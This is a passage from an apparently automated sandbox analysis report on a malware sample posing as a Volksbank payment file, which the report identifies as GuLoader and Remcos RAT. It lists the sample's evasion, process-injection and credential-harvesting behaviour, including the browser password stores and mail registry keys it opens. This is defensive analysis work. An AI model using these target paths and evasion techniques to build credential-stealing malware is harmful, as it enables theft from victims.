            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.cfgJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeUnpacked PE file: 2.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeUnpacked PE file: 3.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeUnpacked PE file: 4.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F42806 push ecx; ret 1_2_34F42819
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F51219 push esp; iretd 1_2_34F5121A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044693D push ecx; ret 2_2_0044694D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044DB70 push eax; ret 2_2_0044DB84
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044DB70 push eax; ret 2_2_0044DBAC
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00451D54 push eax; ret 2_2_00451D61
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0044B090 push eax; ret 3_2_0044B0A4
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0044B090 push eax; ret 3_2_0044B0CC
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00451D34 push eax; ret 3_2_00451D41
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00444E71 push ecx; ret 3_2_00444E81
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004047CB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI/Special instruction interceptor: Address: 5D3FDB4
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI/Special instruction interceptor: Address: 2D3FDB4
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,2_2_0040DD85
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeWindow / User API: threadDelayed 3899Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeWindow / User API: threadDelayed 5790Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI coverage: 9.9 %
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 5204Thread sleep count: 3899 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884Thread sleep time: -81000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884Thread sleep count: 5790 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884Thread sleep time: -17370000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeThread sleep count: Count: 3899 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F410F1 LdrInitializeThunk,LdrInitializeThunk,lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,1_2_34F410F1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F46580 LdrInitializeThunk,FindFirstFileExA,1_2_34F46580
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040AE51 FindFirstFileW,FindNextFileW,2_2_0040AE51
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,3_2_00407EF8
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00418981 memset,GetSystemInfo,2_2_00418981
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2235
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2424
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeAPI call chain: ExitProcess graph end nodegraph_3-34084
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_00402EC1 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,SetFilePointer,LdrInitializeThunk,0_2_00402EC1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F460E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_34F460E2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,2_2_0040DD85
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F44AB4 mov eax, dword ptr fs:[00000030h]1_2_34F44AB4
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F4724E GetProcessHeap,1_2_34F4724E
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F460E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_34F460E2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F42639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_34F42639
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F42B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_34F42B1C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"Jump to behavior
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041C4000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F42933 cpuid 1_2_34F42933
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F42264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_34F42264
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,3_2_004082CD
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403350
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Tries to steal Mail credentials (via file registry)
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: ESMTPPassword3_2_004033F0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword3_2_00402DB3
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword3_2_00402DB3
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 6284, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0V7E34Jump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
